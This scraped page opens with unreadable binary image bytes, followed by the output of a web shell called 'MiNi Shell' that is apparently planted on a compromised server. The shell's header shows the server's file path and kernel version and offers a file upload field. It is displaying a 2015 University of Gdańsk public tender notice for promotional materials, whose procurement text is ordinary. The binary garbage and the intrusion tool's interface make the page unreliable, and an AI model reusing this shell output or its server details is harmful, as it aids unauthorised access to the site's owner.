JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150513/68863-N-2015.html

<p class="kh_header"><b>Gdańsk: Dostawa materiałów promocyjnych w ramach projektu MOBI4Health dla Międzyuczelnianego Wydziału Biotechnologii Uniwersytetu Gdańskiego i GUMed</b><br>
<b>Numer ogłoszenia: 68863 - 2015; data zamieszczenia: 13.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjnych w ramach projektu MOBI4Health dla Międzyuczelnianego Wydziału Biotechnologii Uniwersytetu Gdańskiego i GUMed.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów promocyjnych w ramach projektu MOBI4Health dla Międzyuczelnianego Wydziału Biotechnologii Uniwersytetu Gdańskiego i GUMed: 
1)	Długopis plastikowy z logotypami (900 szt.)
2)	Długopis metalowy z logotypami (200 szt.)
3)	Pamięć USB Flash min. 4GB z logotypami (350 szt.)
4)	Pamięć USB Flash min. 8GB z logotypami (550 szt.)
5)	Notatnik z logotypami (900 szt.)
6)	Smycz z logotypami (650 szt.)
7)	Torba bawełniana z logotypami (650 szt.)
8)	Ołówek z logotypami (700 szt.)
9)	Worek-plecak z logotypami (150 szt.)
10)	Opaska odblaskowa z logotypami (750 szt.)
11)	Magnes na lodówkę z logotypami (500 szt.)
12)	10-12 różnokolorowych kredek w tubie z logotypami (100 szt.)
13)	Balon do nadmuchiwania z logotypami (350 szt.)
14)	Balon do nadmuchiwania z logotypami (350 szt.)
15)	Długopis metalowy ze wskaźnikiem laserowym z logotypami (100 szt.)
16)	Długopis metalowy z końcówką do ekranów dotykowych z logotypami (150 szt.)
17)	Teczka kartonowa na materiały konferencyjne z logotypami (800 szt.)
18)	Kubek termiczny z logotypami (50 szt.)
19)	Kubek ceramiczny z logotypami (100 szt.)
20)	Kubek ceramiczny z logotypami (100 szt.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia ofert wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.

---------------------------------------------------------------------

IV. Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1.)	Posiadania uprawnień  do wykonywania  określonej działalności lub czynności, 
jeżeli przepisy prawa nakładają  obowiązek ich posiadania.
Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
2.)	Posiadania wiedzy i doświadczenia. 
Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej głównej dostawy materiałów promocyjnych odpowiadających swoim rodzajem materiałom stanowiącym przedmiot niniejszego zamówienia, zrealizowanej na kwotę nie mniejszą niż 17 000,00 PLN netto.   
3.)	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi      
do wykonania zamówienia.
Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
4.)	Sytuacji ekonomicznej i finansowej.
Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
2.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki określone powyżej  Wykonawcy mogą spełniać łącznie.
3.	W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu  
z postępowania na podstawie art. 24 ust.1, 2 i 2a ustawy. 
4.	Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły  spełnia - nie spełnia na podstawie  dokumentów opisanych w rozdziale V niniejszej SIWZ. 

V. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu
1.	Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu.
1.1. W zakresie wykazania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy należy przedłożyć:
1.)	Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu o których mowa 
w art.22 ust.1 ustawy podpisane przez osobę(y) upoważnioną(e) do reprezentowania Wykonawcy (załącznik nr 3 do SIWZ).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy 
z warunków określonych w art. 22 ust. 1 ustawy powinien spełniać co najmniej jeden 
z tych Wykonawców albo ci wszyscy Wykonawcy wspólnie. Dlatego też w przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia, oświadczenie z art. 22 ust 1 ustawy, może podpisać pełnomocnik w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (zgodnie z art. 23 ust 2 ustawy), lub wszyscy Wykonawcy razem na jednym dokumencie. Wystarczające jest również złożenie oświadczenia przez tego (tych) z Wykonawców, który samodzielnie spełnia warunki określone w art. 22 ust 1 ustawy.
2.)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej głównej dostawy materiałów promocyjnych odpowiadającej swoim rodzajem materiałom stanowiącym przedmiot niniejszego zamówienia, zrealizowaną na kwotę nie mniejszą 
niż 17 000,00 PLN netto, wraz  z podaniem jej wartości przedmiotu dostawy, dat wykonania i podmiotu na rzecz którego dostawa została zrealizowana, oraz załączenia dowodu, 
czy została wykonana lub jest wykonywana należycie.
1.2. Dowodami, o których mowa w pkt 1 ppkt 2 są: 
1.)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw okresowych
lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące 
przed upływem terminu składania ofert, 
2.)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt 1. 
1.3. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane 
w wykazie, o którym mowa w pkt 1.1 ppkt 2, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 1.2.
1.4. W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio 
w pkt 1.1 ppkt 2 oraz pkt 1.2, budzą wątpliwości Zamawiającego lub gdy z poświadczenia 
albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji 
lub dokumentów bezpośrednio Zamawiającemu. 
1.5. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależenie 
od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 
ust. 2b odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
1.) Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w rozdziale IV pkt 1 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, 
czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp 
do ich zasobów, może żądać: 
a.	dokumentów dotyczących w szczególności: 
- zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, 
przy wykonywaniu zamówienia, 
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
2.) Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w rozdziale IV pkt 1 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 
ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, określonym w pkt 2 ppkt 1-4. 
3.) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyć będzie podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w rozdziale IV pkt 1 SIWZ, Wykonawca będzie obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Jeżeli Wykonawca na potwierdzenie spełnienia w/w warunku udziału w postępowaniu  przedstawi w wykazie wykonanych dostaw wartości wyrażone w innej walucie niż PLN, Zamawiający do oceny spełniania warunków przeliczy podaną wartość po średnim kursie 
tej waluty w stosunku do PLN publikowanym przez NBP z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
2.	W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy należy przedłożyć:
1.)	oświadczenie Wykonawcy o braku podstaw do wykluczenia Wykonawcy z postępowania 
na podstawie art. 24 ust. 1 ustawy, podpisane przez osobę(y) upoważnioną(e)
do reprezentowania Wykonawcy - załącznik nr 4 do SIWZ,
2.)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art.  24 ust. 1 pkt 2 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3.)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,  
że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  
lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione  
nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4.)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych 
lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,  że Wykonawca 
nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne, 
lub  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5.)	oświadczenie o nieprzynależności lub przynależności do grupy kapitałowej, 
zgodnie z art. 26 ust. 2d ustawy - załącznik nr 7 do SIWZ,
W przypadku dwóch lub więcej Wykonawców składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia) - każdy z Wykonawców zobowiązany jest 
do załączenia dokumentów określonych w ppkt 1-5. W imieniu wszystkich członków konsorcjum dokumenty te mogą być złożone przez pełnomocnika, jednakże muszą dotyczyć wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
6.)	zgodnie z art. 24 ust. 2a ustawy  Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca 
w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne 
i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
3.	Ponadto Wykonawca złoży wraz z ofertą:
1.)	Oświadczenie o podwykonawcach. Wykonawca wykonujący zamówienie wyłącznie siłami własnymi  nie dołącza do oferty załącznika nr 5 do SIWZ. 
2.)	Zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 6 do SIWZ; Wykonawca może też zastosować się do informacji  zawartej w rozdz. XVI pkt. 1.
3.)	W  celu  potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dołączenia  do  oferty fotografii, 
dla materiałów szczegółowo wskazanych w załączniku nr 2 do SIWZ - formularzu przedmiotowo-cenowym, których autentyczność musi zostać poświadczona 
przez Wykonawcę (np. poprzez zamieszczenie zapisu potwierdzam autentyczność dokumentu). 
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają jeden komplet dokumentów, o których mowa w punkcie 3. 
4.	Wykonawcy mający siedzibę  lub miejsce zamieszkania za granicą.
1.)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
- zamiast dokumentów  wymienionych  w  rozdziale V pkt 2 ppkt  2, 3 i 4, 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego  likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.)	Dokument, o którym mowa w pkt. 4 ppkt. 1 lit. a powinien być wystawiony 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokumenty, o których mowa w pkt. 4 ppkt. 1 lit. b powinny być wystawione 
nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, 
o których mowa w ppkt 1, zastępuje się je dokumentem zawierającym oświadczenie, 
w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone 
przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Wymogi dotyczące terminów wystawienia dokumentów określone w ppkt 2 stosuje się odpowiednio. 
5.	Informacje dotyczące składania dokumentów: 
1.)	Dokumenty sporządzone w języku obcym muszą być składane 
wraz z tłumaczeniami na język polski poświadczonymi za zgodność z oryginałem 
przez Wykonawcę. Wykonawca wg swojego uznania może złożyć tłumaczenie sporządzone przez tłumacza przysięgłego, które nie wymaga poświadczenia za zgodność.
2.)	Dokumenty mają być składane w formie oryginału lub kopii poświadczonej 
za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do reprezentowania Wykonawcy zgodnie z wpisem w stosownym dokumencie uprawniającym do występowania w obrocie prawnym) lub notariusza.
3.)	W przypadku składania elektronicznych dokumentów, powinny być  one  opatrzone 
przez  Wykonawcę  bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
4.)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega 
na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą być poświadczone za zgodność 
z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
5.)	Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, 
przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym, 
jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.
6.)	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust.1 
oraz art. 26 ust. 2d ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa  w art. 25 ust. 1 oraz art. 26 ust. 2d zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa,  
do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone 
na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych  przez Zamawiającego, nie później niż w dniu, 
w którym upłynął termin składania ofert - art. 26 ust. 3 ustawy.
7.)	Zamawiający wezwie także Wykonawców, w wyznaczonym przez siebie terminie, 
do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 oraz 26 ust. 26d ustawy.
8.)	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy  nie  wykażą spełnienia warunków udziału w postępowaniu. Ofertę Wykonawcy  wykluczonego uznaje się za odrzuconą.
9.)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w trybie art. 23 ust. 1 - 3 ustawy, w tym w ramach konsorcjum.
10.)	W przypadku opisanym w ppkt 9 Wykonawcy ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
11.)	Jeżeli oferta Wykonawców, o których mowa w ppkt 9 została wybrana, Zamawiający żąda aby przed zawarciem umowy w sprawie zamówienia publicznego ww. Wykonawcy przedłożyli umowę regulującą ich współpracę - art. 23 ust 4 ustawy.
12.)	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik (można wystawić jednorazowe pełnomocnictwo do danego postępowania), do oferty musi być załączone pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika z dokumentów rejestracyjnych) zawierające: datę wystawienia, zakres upoważnienia, okres na który zostało wystawione, oraz musi być podpisane przez osoby uprawnione do reprezentacji. 
W przypadku złożenia kopii pełnomocnictwo musi być potwierdzone za zgodność 
z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej głównej dostawy materiałów promocyjnych odpowiadających swoim rodzajem materiałom stanowiącym przedmiot niniejszego zamówienia, zrealizowanej na kwotę nie mniejszą niż 17 000,00 PLN netto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

